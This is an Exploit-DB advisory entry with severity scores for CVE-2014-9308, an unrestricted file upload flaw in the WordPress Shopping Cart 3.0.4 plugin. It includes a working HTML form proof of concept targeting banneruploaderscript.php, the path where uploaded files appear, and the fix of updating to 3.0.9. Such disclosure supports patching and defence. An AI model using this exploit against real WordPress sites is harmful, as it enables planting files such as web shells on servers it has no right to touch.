WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload

2015-01-0800:00:00

Kacper Szurek

www.exploit-db.com

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

6.9 Medium

AI Score

Confidence

Low

0.923 High

EPSS

Percentile

99.0%

JSON

<!--
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps

1. Description
  
Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php

http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html

  
2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):
-->

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>

<!--
File will be visible:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
  
3. Solution:
  
Update to version 3.0.9
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
-->